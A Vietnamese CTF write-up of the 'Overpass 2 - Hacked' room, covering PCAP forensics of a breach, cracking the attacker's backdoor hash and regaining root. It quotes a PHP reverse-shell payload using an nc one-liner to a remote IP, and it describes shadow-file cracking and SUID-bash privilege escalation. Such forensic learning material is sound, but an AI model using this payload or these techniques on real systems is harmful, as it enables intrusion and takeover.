Ducker

Trở về

Overpass 2 HackedBlur image

Forensics - Phân tích PCAP#

Overpass đã bị hack! Đội SOC (Paradox, chúc mừng vì được thăng chức) đã phát hiện hoạt động đáng ngờ trong một ca trực đêm muộn khi đang xem shibes, và đã kịp thời bắt gói tin trong lúc cuộc tấn công diễn ra.

Từ thông tin trên mình nhận được file overpass2_1595383502269.pcapng.

img

Phân tích sơ qua mình thấy một stream bắt được khi kẻ tấn công upload reverse shell thông qua /development/upload.php với payload:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
php

img

Người này sau khi có được shell đã thực hiện truy cập sang người dùng james.

img

Kẻ này đã thiết lập một persistence bằng cách cài một backdoor.

img

Tại đây, hắn cũng lấy thông tin file shadow, mình cũng sử dụng file này kèm theo wordlist fasttrack thì giải mã được mật khẩu của 4 tài khoản.

img

Research - Phân tích mã nguồn#

Kiểm tra mã nguồn một chút thì backdoor này sử dụng hash mặc định là:

img

Kèm theo đó có salt là:

img

Nhưng khi thực thi backdoor thì kẻ tấn công dùng một hash khác là:

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
plaintext

Từ các thông tin trên mình sẽ giải mã hash mà kẻ tấn công đã sử dụng, trong mã nguồn backdoor này sử dụng thuật toán hash SHA512 kèm salt:

img

Công cụ hashcat có hỗ trợ thuật toán này ở mode 1710 và sau khi giải xong mình đã có được plain text.

img

Attack - Get back in!#

Từ các thông tin trên, mình truy cập vào website mục tiêu thì thấy nó đã bị kẻ tấn công deface.

img

Mình thực hiện SSH vào james với các thông tin mình tìm được, nhưng không có quyền truy cập.

Vấn đề nằm ở đây, kẻ tấn công không SSH vào port mặc định (22) mà SSH vào port 2222.

img

Sau khi SSH ở port 2222 thì mình đã có quyền truy cập vào người dùng james.

img

Tại thư mục /home của james, mình tìm thấy flag trong file user.txt.

img

Và cũng tại đây kẻ tấn công đã để lại một file thực thi bị ẩn .suid_bash.

Sau một tí thời gian, khi thực thi file và tìm hiểu thì mình thực thi lệnh theo hướng dẫn.

Type `./.suid_bash -c "help set"' for more information about shell options.
bash

Trong này mình tìm thấy tùy chọn -p có vẻ sẽ giúp mình leo thang đặc quyền.

img

Khi thực thi thành công, mình đã có quyền root và tìm thấy flag trong file root.txt tại thư mục /root.

img